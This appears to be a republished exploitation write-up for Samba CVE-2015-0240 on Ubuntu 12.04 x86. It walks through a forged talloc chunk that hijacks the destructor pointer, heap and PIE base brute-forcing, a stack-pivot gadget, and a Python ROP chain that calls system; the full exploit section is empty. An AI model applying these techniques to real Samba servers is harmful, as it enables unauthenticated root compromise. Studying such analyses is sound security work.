Samba CVE-2015-0240 remote code execution exploit in practice

ID MYHACK58:62201561147
Type myhack58
Reporter Anonymous
Modified 2015-04-14T00:00:00


1 demo

2 background

On February 23, 2015, the Red Hat product security team published an advisory [1] for a vulnerability in smbd, the Samba server daemon. The vulnerability, CVE-2015-0240, affects almost all versions. Triggering it requires no authentication against the Samba server, and smbd usually runs with root privileges, so if the vulnerability can be turned into arbitrary code execution, a remote attacker obtains root privileges on the system. The impact is extremely serious, and the vulnerability accordingly received a CVSS score of 10.

The root cause is that an uninitialized pointer on the stack is passed to the TALLOC_FREE() function. To exploit it, one must first control the uninitialized data on the stack, which depends on the stack layout of the compiled binary. Several security researchers abroad therefore analyzed the binaries shipped by different Linux distributions. Worawit Wang (@sleepya_) obtained the best result: he confirmed that on Ubuntu 12.04 x86 (Samba 3.6.3) and Debian 7 x86 (Samba 3.6.6) the vulnerability can be used for remote arbitrary code execution; see the comments in [2]. Later, researchers at the UK security company NCC Group described an exploitation approach [4], but gave neither exploitation details nor exploit code. This article analyzes the vulnerability in detail and implements a remote arbitrary code execution exploit against the Samba server on Ubuntu 12.04 x86 (the Debian 7 x86 case is similar).

3 vulnerability profile

Many articles have already analyzed the vulnerability [3], so only a brief introduction is given here. The vulnerability is in the function _netr_ServerPasswordSet(). The local variable creds is supposed to be initialized by netr_creds_server_step_check(), but if the input is crafted so that netr_creds_server_step_check() fails, creds is passed to TALLOC_FREE() without ever having been initialized:

    NTSTATUS _netr_ServerPasswordSet(struct pipes_struct *p,
                                     struct netr_ServerPasswordSet *r)
    {
        NTSTATUS status = NT_STATUS_OK;
        int i;
        struct netlogon_creds_CredentialState *creds;   /* never initialized */
        [...]
        status = netr_creds_server_step_check(p, p->mem_ctx,
                                              r->in.computer_name,
                                              r->in.credential,
                                              r->out.return_authenticator,
                                              &creds);
        unbecome_root();

        if (!NT_STATUS_IS_OK(status)) {
            [...]
            TALLOC_FREE(creds);   /* creds may still hold stale stack data */
            return status;
        }

4 exploit

We first check which protection mechanisms are enabled in the smbd binary:

    $ --file smbd
    RELRO        STACK CANARY   NX           PIE          RPATH      RUNPATH      FILE
    Full RELRO   Canary found   NX enabled   PIE enabled  No RPATH   No RUNPATH   smbd

Every protection mechanism the compiler can add is enabled. PIE deserves the most attention: to use code fragments of the binary itself for ROP, or to call imported functions, we must first learn the address at which the program is loaded.

4.1 arbitrary-address free

To exploit the vulnerability, we first need a control flow that lets us control the uninitialized stack pointer creds, so that TALLOC_FREE() can be called on an arbitrary address. From the PoC by @sleepya_ we already know that on Ubuntu 12.04 and Debian 7 x86, the ReferentID field of PrimaryName in the NetrServerPasswordSet request happens to land at the stack location of the uninitialized pointer creds. Setting ReferentID therefore gives us a free of an arbitrary address. The PoC code is as follows:

    primaryName = nrpc.PLOGONSRV_HANDLE()
    # ReferentID field of PrimaryName controls the uninitialized value of creds in ubuntu 12.04 32bit
    primaryName.fields['ReferentID'] = 0x41414141

4.2 controlling EIP

With an arbitrary-address free, the natural idea is to make TALLOC_FREE() release a memory block that we control. However, we do not know the address of the memory we control: the data of the DCERPC request is stored on the heap. We can brute-force the heap address, because smbd handles each connection in a forked process, so the memory layout stays the same from one connection to the next. In addition, we can place a large number of TALLOC chunks on the heap to raise the hit rate and shrink the enumeration space as much as possible. Assume for now that the heap address is already known, and look at how to construct a TALLOC chunk that hijacks EIP. For that we need to understand TALLOC_FREE(). First, the structure of a TALLOC chunk:

    struct talloc_chunk {
        struct talloc_chunk *next, *prev;
        struct talloc_chunk *parent, *child;
        struct talloc_reference_handle *refs;
        talloc_destructor_t destructor;
        const char *name;
        size_t size;
        unsigned flags;
        void *pool;
        /* 8 bytes padding */
    };
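The size of this header on a 32-bit build can be checked with a little arithmetic. The sketch below assumes that pointers, size_t, and unsigned are all 4 bytes wide on x86; the helper name align16 is ours and is not taken from talloc.

```python
# Field widths for a 32-bit x86 build (assumption: pointers, size_t and
# unsigned are all 4 bytes wide).
FIELDS = [
    ("next", 4), ("prev", 4),
    ("parent", 4), ("child", 4),
    ("refs", 4),
    ("destructor", 4),
    ("name", 4),
    ("size", 4),
    ("flags", 4),
    ("pool", 4),
]


def align16(n):
    """Round n up to the next multiple of 16 (hypothetical helper)."""
    return (n + 15) & ~15


raw_size = sum(width for _, width in FIELDS)   # bytes used by the named fields
header_size = align16(raw_size)                # size after 16-byte alignment
padding = header_size - raw_size               # trailing padding bytes

print(raw_size, padding, header_size)  # 40 8 48
```

The ten named fields take 40 bytes, so rounding up to a multiple of 16 adds 8 bytes of padding.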

To satisfy 16-byte alignment, the structure ends with 8 bytes of padding, so a talloc_chunk occupies 48 bytes in total. The destructor member is a function pointer, which we can set to any value. Now look at the code that the TALLOC_FREE() macro expands to:

    PUBLIC int _talloc_free(void *ptr, const char *location)
    {
        struct talloc_chunk *tc;

        if (unlikely(ptr == NULL)) {
            return -1;
        }

        tc = talloc_chunk_from_ptr(ptr);
        ...
    }

_talloc_free() calls talloc_chunk_from_ptr(), which converts the pointer ptr that was returned to the user at allocation time into a pointer to the talloc_chunk header.

    /* panic if we get a bad magic value */
    static inline struct talloc_chunk *talloc_chunk_from_ptr(const void *ptr)
    {
        const char *pp = (const char *)ptr;
        struct talloc_chunk *tc = discard_const_p(struct talloc_chunk, pp - TC_HDR_SIZE);
        if (unlikely((tc->flags & (TALLOC_FLAG_FREE | ~0xF)) != TALLOC_MAGIC)) {
            if ((tc->flags & (~0xFFF)) == TALLOC_MAGIC_BASE) {
                talloc_abort_magic(tc->flags & (~0xF));
                return NULL;
            }

            if (tc->flags & TALLOC_FLAG_FREE) {
                talloc_log("talloc: access after free error- first free may be at %s\n", tc->name);
                talloc_abort_access_after_free();
                return NULL;
            } else {
                talloc_abort_unknown_value();
                return NULL;
            }
        }
        return tc;
    }
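The branches of the flags test can be modeled in a few lines of Python. This is only a sketch: the numeric constants below are not given in this article and are assumed to match talloc 2.0.x, and classify_flags is a name of our own.

```python
MASK32 = 0xFFFFFFFF

# Assumed constants: not stated in the article, believed to match talloc 2.0.x.
TALLOC_MAGIC_BASE = 0xE814EC70
TALLOC_MAGIC = 0xE8150C70
TALLOC_FLAG_FREE = 0x01


def classify_flags(flags):
    """Mirror the branches of talloc_chunk_from_ptr() for a 32-bit flags word."""
    flags &= MASK32
    # Only the FREE bit and the upper 28 bits take part in the magic comparison.
    if (flags & ((TALLOC_FLAG_FREE | ~0xF) & MASK32)) == TALLOC_MAGIC:
        return "ok"
    if (flags & (~0xFFF & MASK32)) == TALLOC_MAGIC_BASE:
        return "abort: bad magic version"
    if flags & TALLOC_FLAG_FREE:
        return "abort: access after free"
    return "abort: unknown value"


print(classify_flags(TALLOC_MAGIC))         # ok
print(classify_flags(TALLOC_MAGIC | 0x02))  # ok: bit 0x02 is masked out
print(classify_flags(TALLOC_MAGIC | 0x01))  # abort: access after free
```

Bits 1 to 3 of flags are ignored by the comparison, so a chunk may carry those flag bits and still pass the magic check.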

The function simply subtracts TC_HDR_SIZE from the user pointer and returns the result; TC_HDR_SIZE is the size of talloc_chunk, 48. However, the tc->flags check must pass, that is, flags must contain the correct magic number; otherwise the function does not return a valid pointer. Next, we continue with the _talloc_free() function:

    PUBLIC int _talloc_free(void *ptr, const char *location)
    {
        ...
        tc = talloc_chunk_from_ptr(ptr);

        if (unlikely(tc->refs != NULL)) {
            struct talloc_reference_handle *h;

            if (talloc_parent(ptr) == null_context && tc->refs->next == NULL) {
                return talloc_unlink(null_context, ptr);
            }

            talloc_log("ERROR: talloc_free with references at %s\n", location);

            for (h=tc->refs; h; h=h->next) {
                talloc_log("\treference at %s\n", h->location);
            }
            return -1;
        }

        return _talloc_free_internal(ptr, location);
    }

If tc->refs is not NULL, the if branch is entered. To get through the first inner if without crashing, we would need to set the tc->parent pointer to NULL, and the for loop that follows additionally requires tc->refs to point to a valid linked list, which is rather complicated. So consider the case where tc->refs is NULL, in which the program goes on to the _talloc_free_internal() function:

    static inline int _talloc_free_internal(void *ptr, const char *location)
    {
        ...
        if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) {
            /* we have a free loop - stop looping */
            return 0;
        }

        if (unlikely(tc->destructor)) {
            talloc_destructor_t d = tc->destructor;
            if (d == (talloc_destructor_t)-1) {
                return -1;
            }
            tc->destructor = (talloc_destructor_t)-1;
            if (d(ptr) == -1) {   // call destructor
                tc->destructor = d;
                return -1;
            }
            tc->destructor = NULL;
        }
        ...
    }

The parts of the function that do not matter here are omitted. In the code above, the destructor of the talloc_chunk gets called, but some checks come first. For the first if, TALLOC_FLAG_LOOP must not be set in flags. For the second if, a destructor of -1 makes the function return -1 without crashing, whereas a destructor set to any other invalid address makes the program crash and exit. This behavior lets us verify whether a guessed heap address is correct: during enumeration we set the destructor to -1; once we find an address for which TALLOC_FREE() does not crash the program and the request returns, we set the destructor to an invalid address; if the program crashes this time, the address we found is correct. To summarize, the chunk we construct must satisfy the following conditions:

    struct talloc_chunk {
        struct talloc_chunk *next, *prev;       // no requirement
        struct talloc_chunk *parent, *child;    // no requirement
        struct talloc_reference_handle *refs;   // refs = 0
        talloc_destructor_t destructor;         // destructor = -1: no crash; other values: controlled EIP
        const char *name;
        size_t size;
        unsigned flags;                         // condition 1: (flags & (TALLOC_FLAG_FREE | ~0xF)) == TALLOC_MAGIC
                                                // condition 2: (flags & TALLOC_FLAG_LOOP) == 0
        void *pool;                             // no requirement
        /* 8 bytes padding */                   // no requirement
    };
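The decision logic summarized above can be written down as a small model. This is a sketch for a chunk that has already passed the magic check; the value of TALLOC_FLAG_LOOP is an assumption not given in the article, and free_outcome is a hypothetical name.

```python
TALLOC_FLAG_LOOP = 0x02            # assumed value, not given in the article
DESTRUCTOR_MINUS_ONE = 0xFFFFFFFF  # (talloc_destructor_t)-1 on a 32-bit build


def free_outcome(refs, destructor, flags):
    """Predict what _talloc_free() does with a chunk that passed the magic check."""
    if refs != 0:
        return "refs path"         # would need a valid reference list
    if flags & TALLOC_FLAG_LOOP:
        return "return 0"          # free loop detected, destructor skipped
    if destructor == 0:
        return "no destructor"     # the destructor block is skipped entirely
    if destructor == DESTRUCTOR_MINUS_ONE:
        return "return -1"         # no call is made and nothing crashes
    return "call destructor"       # control transfers to the stored address


print(free_outcome(refs=0, destructor=DESTRUCTOR_MINUS_ONE, flags=0))  # return -1
print(free_outcome(refs=0, destructor=0x41414141, flags=0))            # call destructor
```

The two calls correspond to the two probes described in the text: a destructor of -1 returns cleanly, while any other non-zero value is called.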

At this point we know how to control EIP by constructing a chunk and passing it to TALLOC_FREE().

4.3 enumerating the heap address

After modifying the PoC and debugging with gdb, we found that the new password, uasNewPass['Data'] in the PoC, can be used to place a large number of chunks. Although much of the data in a request sent to Samba ends up on the heap, such as the user name and password (see [2]), most of it must be valid WSTR-encoded data and cannot carry arbitrary bytes. To make enumerating the heap address more efficient, we adopt the idea proposed in [4] of a compressed chunk that contains only the five fields refs, destructor, name, size, and flags, which shrinks the chunk from 48 bytes to 20 bytes. As a result, only 5 offsets have to be tried for each candidate address instead of the original 12. The figure below shows how the injected compressed chunks correspond to the actual talloc_chunk structure.

[Figure: correspondence between the injected compressed chunks and the actual talloc_chunk structure]
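The figures of 5 and 12 offsets follow from the chunk sizes. The sketch below assumes that the injected data is one pattern repeated back to back and that candidate addresses are 4-byte aligned; this is our reading of the idea in [4], and the function name is hypothetical.

```python
WORD = 4  # bytes per 32-bit word


def offsets_per_address(pattern_size):
    """Number of 4-byte-aligned positions a guess can take within one repeated pattern."""
    return pattern_size // WORD


full = offsets_per_address(48)        # whole talloc_chunk header repeated
compressed = offsets_per_address(20)  # refs, destructor, name, size, flags only

print(full, compressed)  # 12 5
```

A guessed address can fall on any word of the repeating pattern, so a shorter pattern means fewer alignments to try per candidate address.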

The number of injected chunks also affects enumeration efficiency. The more chunks are injected into memory, the smaller the space that has to be enumerated, but the time spent per attempt on network transfer, input processing in the server, and similar factors grows as well, so a compromise value has to be chosen for the situation at hand. In addition, our exploit uses a process pool to enumerate in parallel, which further improves efficiency.

4.4 ROP

To build a ROP chain, we also need to enumerate the load base address of the Samba binary. Address randomization works at the granularity of a memory page, so we enumerate page by page, in steps of 0x1000 bytes. Extensive testing of the possible address range on our platform showed roughly 0x200 candidates, which is acceptable. So far the destructor gives us control of EIP only once, so ROP first requires a stack pivot. We found the following gadget in the samba binary:

0x000a6d7c: lea esp, dword [ecx-0x04] ; ret ;

At the point where we gain control of EIP, ecx-0x4 points exactly at the name field of the chunk, so the ROP chain can start at the name field. Placing a pop4ret gadget (pop eax ; pop esi ; pop edi ; pop ebp ; ret ;) there makes esp point to the name field of the next compressed chunk, and so on down the chain, until esp reaches the end of the memory we injected, where a ROP payload of unlimited length can be written.

[4] does not give a specific stack pivot gadget, but judging from the figure in that article, the NCC Group researchers presumably used the same one.

4.5 arbitrary code execution

Note that smbd imports the system function, so we can call system directly through its PLT address to execute arbitrary commands. The question is where to write the command. If it were placed in the injected data, the only addresses we know are those of the compressed chunks, and only 4 bytes of each are available. We therefore call snprintf to write the command byte by byte into the bss section, which allows commands of arbitrary length. Note that because the binary is compiled as position-independent code (PIC), the address of the GOT has to be restored into the ebx register before calling snprintf and system. The Python code that generates the ROP payload is as follows:

    # ebx => got
    rop = l32(popebx) + l32(got)
    # write cmd to bss, fmt == "%c"
    for i in xrange(len(cmd)):
        c = cmd[i]
        rop += l32(snprintf) + l32(pop4ret)
        rop += l32(bss + i) + l32(2) + l32(fmt) + l32(ord(c))
    # system(cmd)
    rop += l32(system) + 'leet' + l32(bss)
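The snippet relies on a helper l32 that the article does not show. A plausible definition, assuming it packs an integer as a 32-bit little-endian word as is common in exploit helper libraries, would be:

```python
import struct


def l32(value):
    """Pack an integer as a 32-bit little-endian word (assumed meaning of l32)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


word = l32(0x41424344)
print(len(word))  # 4
```

Each loop iteration lays out one call of the form snprintf(bss + i, 2, "%c", c). With a size argument of 2, snprintf writes one character followed by a terminating NUL, so the string in bss is NUL-terminated after the last iteration.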

The method used in [4] is the conventional mmap() + memcpy() followed by executing shellcode, which achieves the same effect.

4.6 full exploit code

5 references

  1. Samba vulnerability (CVE-2015-0240)
  2. PoC for Samba vulnerabilty (CVE-2015-0240)
  3. Samba _netr_ServerPasswordSet Expoitability Analysis
  4. Exploiting Samba CVE-2015-0240 on Ubuntu 12.04 and Debian 7 32-bit